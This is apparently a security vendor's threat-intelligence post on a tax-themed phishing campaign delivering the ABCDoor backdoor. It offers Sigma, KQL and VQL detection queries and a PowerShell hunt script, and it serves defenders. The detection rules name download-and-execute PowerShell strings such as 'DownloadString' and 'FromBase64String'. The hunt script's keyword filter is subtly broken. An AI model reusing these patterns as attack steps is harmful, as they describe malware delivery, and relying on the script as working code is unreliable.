Back to Intelligence

Silver Fox ABCDoor Malware Campaign: Detection and Response for India/Russia Tax Phishing

SA
Security Arsenal Team
May 4, 2026
6 min read

The China-nexus threat actor known as Silver Fox has resurfaced with a sophisticated campaign actively targeting organizations in India and Russia. Utilizing a new malware family designated ABCDoor, the group relies on highly convincing tax-themed social engineering lures—specifically impersonating the Income Tax Department of India—to deliver its payload.

Given the campaign's active status and the high-value targets involved, defenders must immediately elevate their detection posture. This is not a theoretical risk; it is an active intrusion attempt leveraging the urgency of tax compliance to bypass user skepticism.

Technical Analysis

Threat Actor: Silver Fox (China-based) Target Geography: India, Russia Malware Family: ABCDoor (New Variant) Attack Vector: Social Engineering / Phishing Email

Attack Chain Breakdown

  1. Initial Access: The campaign begins with a phishing email designed to mimic official correspondence. In the Indian wave, attackers spoofed the Income Tax Department. While specific attachments weren't detailed in the source, similar Silver Fox campaigns typically utilize ISO files, HTML smuggling, or malicious Office documents with macros.
  2. Execution: Once the user interacts with the lure (e.g., opening an attachment), the payload drops and executes the ABCDoor malware.
  3. Payload Capabilities: ABCDoor functions as a backdoor, granting the threat actor remote access to the infected host. This allows for further lateral movement, data exfiltration, or deployment of secondary payloads such as ransomware or spyware.
  4. C2 Communications: The malware establishes a command-and-control (C2) channel to receive instructions.

Exploitation Status: Confirmed Active Exploitation (In-the-wild).

Detection & Response

The following detection rules and queries are designed to identify the specific TTPs (Tactics, Techniques, and Procedures) associated with this Silver Fox campaign, focusing on the social engineering vector and the subsequent execution of ABCDoor.

SIGMA Rules

YAML
---
title: Silver Fox Tax-Themed Phishing Email Indicators
id: 8a1b2c3d-4e5f-6789-0123-456789abcdef0
status: experimental
description: Detects emails with subject lines mimicking tax authorities (India/Russia) often associated with Silver Fox campaigns delivering ABCDoor.
references:
  - https://thehackernews.com/2026/05/silver-fox-deploys-abcdoor-malware-via.html
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.initial_access
  - attack.t1566.001
logsource:
  product: email
  category: header
detection:
  selection_keywords:
    Subject|contains:
      - 'Income Tax'
      - 'Tax Department'
      - 'Notice of Assessment'
      - 'Tax Refund'
      - 'Federal Tax Service'
  selection_suspicious_ext:
    AttachmentFileExtensions|contains:
      - '.iso'
      - '.exe'
      - '.dll'
      - '.js'
      - '.vbs'
  condition: selection_keywords and selection_suspicious_ext
falsepositives:
  - Legitimate tax correspondence (rarely contains dangerous attachments)
level: high
---
title: Suspicious Process Spawn via Office Applications
id: 9b2c3d4e-5f6a-7890-1234-56789abcdef0
status: experimental
description: Detects Office applications spawning suspicious child processes typical of macro-dropping or template-injection techniques used to install malware like ABCDoor.
references:
  - https://attack.mitre.org/techniques/T1566/001/
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.execution
  - attack.t1204.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\WINWORD.EXE'
      - '\EXCEL.EXE'
      - '\POWERPNT.EXE'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\mshta.exe'
      - '\wscript.exe'
      - '\cscript.exe'
  selection_cli:
    CommandLine|contains:
      - 'Invoke-Expression'
      - 'DownloadString'
      - 'FromBase64String'
  condition: selection_parent and selection_child and selection_cli
falsepositives:
  - Legitimate macro usage (rarely uses obfuscated PowerShell)
level: high
---
title: ABCDoor Potential C2 Traffic Pattern
id: 0c1d2e3f-4a5b-6789-2345-67890abcdef0
status: experimental
description: Detects potential C2 traffic associated with Silver Fox/ABCDoor based on high-entropy user-agents or non-standard browser processes connecting to suspicious top-level domains.
references:
  - Internal Threat Intelligence
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.command_and_control
  - attack.t1071.001
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    Image|endswith:
      - '\regsvr32.exe'
      - '\rundll32.exe'
      - '\powershell.exe'
  filter_legit:
    DestinationHostname|contains:
      - '.microsoft.com'
      - '.windowsupdate.com'
      - '.gov.in'
      - '.gov.ru'
  condition: selection and not filter_legit
falsepositives:
  - Rare legitimate system updates via these binaries
level: medium

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender
// Hunt for tax-themed emails with attachments
EmailEvents
| where Timestamp > ago(30d)
| where Subject has_any ("Income Tax", "Tax Department", "Tax Refund", "Federal Tax")
| where AttachmentCount > 0
| project Timestamp, Subject, SenderFromAddress, RecipientEmailAddress, AttachmentNames
| extend TaxIndicators = case(Subject has "Income", "Income Tax Impersonation", Subject has "Refund", "Refund Scam", "Other Tax Theme")

// Hunt for suspicious child processes spawned by Office apps
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ("winword.exe", "excel.exe", "powerpnt.exe")
| where FileName in~ ("powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe")
| project Timestamp, DeviceName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, AccountName
| where ProcessCommandLine contains "Download" or ProcessCommandLine contains "Encoded"

Velociraptor VQL

VQL — Velociraptor
// Hunt for suspicious Office spawned processes
SELECT Pid, Name, CommandLine, ParentPid, Username
FROM pslist()
WHERE Parent.Name =~ "(WINWORD.EXE|EXCEL.EXE|POWERPNT.EXE)"
  AND Name =~ "(powershell.exe|cmd.exe|mshta.exe|wscript.exe)"

// Hunt for tax-themed lure files in user directories
SELECT FullPath, Size, Mtime, Btime
FROM glob(globs="*/Downloads/*", root="C:\Users\")
WHERE FileName =~ "(?i)(tax|income|refund|notice|department)"
  AND (FullPath =~ "\\.(iso|exe|dll|js|vbs|docm|xlsm)$")
  AND Mtime > now() - 90 * 86400

Remediation Script (PowerShell)

PowerShell
<#
.SYNOPSIS
    Incident Response script to hunt for and quarantine artifacts related to Silver Fox ABCDoor tax-themed lures.
.DESCRIPTION
    Scans user directories for files matching the naming convention of the phishing campaign and checks for suspicious running processes.
#>

# Define suspicious keywords and extensions
$Keywords = @("Income Tax", "Tax Refund", "Notice", "Assessment", "Federal Tax")
$Extensions = @(".exe", ".iso", ".dll", ".vbs", ".js", ".docm", ".xlsm", ".zip")
$UserFolders = @("C:\Users\*\Downloads", "C:\Users\*\Desktop", "C:\Users\*\Documents")

Write-Host "[*] Starting hunt for Silver Fox artifacts..." -ForegroundColor Cyan

# Scan for suspicious files
foreach ($Folder in $UserFolders) {
    if (Test-Path $Folder) {
        Write-Host "[*] Scanning $Folder..." -ForegroundColor Gray
        Get-ChildItem -Path $Folder -Recurse -ErrorAction SilentlyContinue | 
        Where-Object { 
            ($_.LastWriteTime -gt (Get-Date).AddDays(-90)) -and 
            ($_.Extension -in $Extensions) -and 
            ($Keywords | Where-Object { $_.BaseName -match $_ })
        } | ForEach-Object {
            Write-Host "[!] SUSPICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
            # Optional: Remove file (Uncomment below to enable deletion)
            # Remove-Item -Path $_.FullName -Force
        }
    }
}

# Check for suspicious process relationships
$suspiciousParents = @("winword.exe", "excel.exe", "powerpnt.exe")
$suspiciousChildren = @("powershell.exe", "cmd.exe", "mshta.exe")

Write-Host "[*] Checking for suspicious process chains..." -ForegroundColor Gray
Get-Process | Where-Object { 
    $suspiciousChildren -contains $_.ProcessName 
} | ForEach-Object {
    $parent = Get-Process -Id $_.Parent.Id -ErrorAction SilentlyContinue
    if ($parent -and $suspiciousParents -contains $parent.ProcessName) {
        Write-Host "[!] ALERT: $($parent.ProcessName) spawned $($_.ProcessName) (PID: $($_.Id))" -ForegroundColor Red
    }
}

Write-Host "[*] Scan complete." -ForegroundColor Green

Remediation

  1. Block Email Indicators: immediately update Secure Email Gateway (SEG) rules to block or sandbox emails containing subject lines referencing "Income Tax," "Tax Refund," or "Notice" originating from external, non-whitelisted domains.
  2. User Awareness: Mobilize the security awareness team immediately. Send a high-priority alert to staff in India and Russia regions regarding the ongoing tax-themed phishing campaign. Instruct users to report, not open, these emails.
  3. Endpoint Isolation: If ABCDoor infection is confirmed via the detection logic above, isolate affected endpoints from the network immediately to prevent lateral movement.
  4. Indicator Enrichment: While specific IoCs (hashes, IPs) were not disclosed in the summary, hunt for file creations in C:\Users\Public\ or %TEMP% following the execution of Office applications.
  5. Review Proxy/DNS Logs: Look for anomalous connections from internal endpoints to domains registered within the last 30 days, particularly those utilizing non-standard TLDs or high-entropy domain names.

Related Resources

Security Arsenal Incident Response Services AlertMonitor Platform Book a SOC Assessment incident-response Intel Hub

incident-responseransomwarebreach-responseforensicsdfirsilver-foxabcdoormalware

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action